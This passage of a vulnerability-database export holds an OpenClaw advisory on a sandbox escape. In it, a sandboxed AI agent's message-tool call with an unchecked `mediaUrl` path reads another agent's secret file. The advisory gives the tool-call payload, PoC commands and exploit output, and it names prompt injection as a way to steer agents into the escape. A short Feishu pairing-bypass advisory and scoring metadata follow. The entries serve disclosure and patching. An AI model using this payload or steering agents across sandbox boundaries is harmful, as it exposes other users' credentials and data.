A sandboxed agent (Agent-A at `~/.openclaw/workspace/agent-a/`) calls the message tool with `{ mediaUrl: \"~/.openclaw/workspace/agent-b/secret.txt\" }`\n2. `normalizeSandboxMediaParams` skips the `mediaUrl` key (not in allowlist)\n3. `handlePluginAction` dispatches without `mediaLocalRoots`\n4. Plugin calls `loadWebMedia` with default roots, which allows `~/.openclaw/workspace/**`\n5. Agent-B's secret file content is read and sent as a channel attachment\n\n### PoC\n\n**Prerequisites:**\n- Docker installed\n- OpenClaw Docker image built (`openclaw-gateway:latest`)\n\n**Steps:**\n\n1. Start the vulnerable gateway container:\n\n```bash\ncd llm-enhance/cve-finding/Path_Traversal/CVE-2026-27522-Media_Root_Bypass-variant-exp/\ndocker compose up -d\nsleep 5\n```\n\n2. Run the exploit:\n\n```bash\npython3 poc_exploit.py\n```\n\n3. The exploit writes a secret file to `~/.openclaw/workspace/agent-b/secret_key.txt` inside the container, then invokes `normalizeSandboxMediaParams` with Agent-A's sandbox policy and `{ mediaUrl: <agent-b-secret-path> }`. The `mediaUrl` key bypasses normalization, and `loadWebMedia` reads the file successfully.\n\n4. 
Run the control experiment to confirm sandbox works for checked keys:\n\n```bash\npython3 control-sandbox_enforced.py\n```\n\n### Log of Evidence\n\n**Exploit output:**\n```\n=== CVE-2026-27522 Variant: Sandbox Media Root Bypass ===\n\n[*] Container 'openclaw-media-bypass-test' is running\n[*] Running exploit script with Bun...\n\n[VULNERABLE] mediaUrl bypassed normalizeSandboxMediaParams!\n  Agent-A sandboxRoot: /root/.openclaw/workspace/agent-a\n  mediaUrl targets Agent-B: /root/.openclaw/workspace/agent-b/secret_key.txt\n  args after normalization: {\"mediaUrl\":\"/root/.openclaw/workspace/agent-b/secret_key.txt\"}\n[EXPLOITED] Agent-B secret file content: AGENT-B-SECRET-API-KEY-sk-12345abcdef\n\n=== EXPLOIT SUCCESSFUL ===\nAgent-A read Agent-B's secret file via mediaUrl, bypassing sandbox.\n\n[+] RESULT: VULNERABLE — mediaUrl bypasses sandbox enforcement\n```\n\n**Control experiment output:**\n```\n=== Control Experiment: Sandbox Enforcement for 'media' Key ===\n\n[*] Container 'openclaw-media-bypass-test' is running\n[*] Running control script with Bun...\n\n[SAFE] normalizeSandboxMediaParams blocked 'media' key as expected!\n  Error: Path escapes sandbox root (/tmp/sandbox-ZKvGQX): /tmp/victim-2cuAOO/secret.txt\n\n=== CONTROL EXPERIMENT PASSED ===\nThe 'media' parameter IS correctly checked by sandbox enforcement.\nOnly unchecked keys (mediaUrl, fileUrl) bypass the sandbox.\n\n[+] CONTROL PASSED: 'media' key is correctly enforced by sandbox\n```\n\n### Impact\nThis is a **sandbox escape** vulnerability. An attacker who can influence an agent's tool calls (via prompt injection, multi-agent interaction, or malicious plugin instruction) can read arbitrary files from other agents' workspaces. 
This includes:\n- API keys and secrets stored in other agents' sandboxes\n- Session data and conversation logs\n- Configuration files with sensitive credentials\n- Any file within the `~/.openclaw/` directory tree\n\nThis completely defeats the purpose of the multi-agent sandbox isolation feature, which is documented as a security boundary in the project's Docker and sandboxing documentation.\n\n### Affected products\n- **Ecosystem**: npm\n- **Package name**: openclaw\n- **Affected versions**: <= 2026.3.14 (current latest at the time of the report)\n- **Patched versions**: <None> at the time of the report; the note at the top of this advisory states the fix shipped in OpenClaw 2026.3.24\n\n### Severity\n- **Severity**: High\n- **Vector string**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n\n### Weaknesses\n- **CWE**: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\n\n### Occurrences\n\n| Permalink | Description |\n| :--- | :--- |\n| [https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-params.ts#L206-L227](https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-params.ts#L206-L227) | The `normalizeSandboxMediaParams` function with incomplete `mediaKeys` allowlist — `mediaUrl` and `fileUrl` are not checked. |\n| [https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-runner.ts#L684-L697](https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-runner.ts#L684-L697) | The `handlePluginAction` dispatch call that omits `mediaLocalRoots` from the context passed to `dispatchChannelMessageAction`. |\n| [https://github.com/moltbot/moltbot/blob/main/src/channels/plugins/types.core.ts#L478](https://github.com/moltbot/moltbot/blob/main/src/channels/plugins/types.core.ts#L478) | The `ChannelMessageActionContext` type that defines `mediaLocalRoots` but never receives it from `handlePluginAction`. 
|","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35668","reference_id":"","reference_type":"","scores":[{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.17041","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.17002","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.17037","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35668"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hr5v-j9h9-xjhg","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:26:56Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hr5v-j9h9-xjhg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35668","reference_id":"CVE-2026-35668","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35668"},{"reference_url":"https://github.com/advisories/GHSA-hr5v-j9h9-xjhg","reference_id":"GHSA-hr5v-j9h9-xjhg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"ur
l":"https://github.com/advisories/GHSA-hr5v-j9h9-xjhg"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-media-root-bypass-via-unnormalized-mediaurl-and-fileurl-parameters","reference_id":"openclaw-sandbox-media-root-bypass-via-unnormalized-mediaurl-and-fileurl-parameters","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:26:56Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-media-root-bypass-via-unnormalized-mediaurl-and-fileurl-parameters"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vu
lnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vu
lnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vu
lnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vu
lnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35668","GHSA-hr5v-j9h9-xjhg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d3qp-5wm9-aqfp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90876?format=json","vulnerability_id":"VCID-d864-qy75-c3dx","summary":"OpenClaw: Feishu Raw Card Send Surface Can Mint Legacy Card Callbacks That Bypass DM Pairing\n## Summary\n\nFeishu Raw card Send Surface Can Mint Legacy Card Callbacks That Bypass DM Pairing\n\n## Affected Packages / 
Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nFeishu raw card sends could previously mint legacy callback payloads that bypassed DM pairing and let unpaired recipients reach callback handling. Commit `81c45976db532324b5a0918a70decc19520dc354` rejects legacy raw-card command payloads so callbacks stay on the normal paired path.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `81c45976db532324b5a0918a70decc19520dc354`.\n\n## Fix Commit(s)\n\n- `81c45976db532324b5a0918a70decc19520dc354`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35664","reference_id":"","reference_type":"","scores":[{"value":"0.00098","scoring_system":"epss","scoring_elements":"0.27048","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00098","scoring_system":"epss","scoring_elements":"0.27001","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00098","scoring_system":"epss","scoring_elements":"0.2704","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35664"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/81c45976db532324b5a0918a70decc19520dc354","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:57
:40Z/"}],"url":"https://github.com/openclaw/openclaw/commit/81c45976db532324b5a0918a70decc19520dc354"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-77w2-crqv-cmv3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:57:40Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-77w2-crqv-cmv3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35664","reference_id":"CVE-2026-35664","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35664"},{"reference_url":"https://github.com/advisories/GHSA-77w2-crqv-cmv3","reference_id":"GHSA-77w2-crqv-cmv3","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-77w2-crqv-cmv3"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-dm-pairing-bypass-via-legacy-card-callbacks","reference_id":"openclaw-dm-pairing-bypass-via-legacy-card-callbacks","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:57:40Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-dm-pairing-bypass-via-legacy-card-callbacks"}],"fixed_packages":[{"url":"http:/
/public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerabil
ity":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerabil
